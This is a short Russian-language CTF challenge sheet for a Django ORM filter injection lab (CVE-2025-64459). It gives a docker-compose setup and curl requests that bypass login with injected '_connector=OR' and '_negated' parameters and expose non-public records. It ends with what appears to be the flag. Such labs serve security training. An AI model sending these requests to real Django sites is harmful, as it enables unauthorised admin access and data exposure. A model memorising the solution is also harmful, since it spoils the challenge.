
CTF-задача, демонстрирующая внедрение фильтра Django ORM (CVE-2025-64459) с обходом аутентификации и обходом фильтра продуктов, включая развертывание и получение флага.
Категория: Веб-безопасность
Сложность: Средняя
Уязвимость: CVE-2025-64459 - Django ORM Filter Injection
Мы создали защищенный магазин мерча с панелью администратора. Сможете ли вы обойти аутентификацию и найти приватную заметку администратора?
URL: http://YOUR_SERVER:6008
cd web_django_cve
docker-compose up --build -d
# Использование _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"
# Использование _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"
# Отрицание фильтра is_public
curl "http://HOST:8054/?_negated=True"
# Прямой доступ
curl "http://HOST:8054/?is_public=False"
lol-you-here_then-you_exploited_me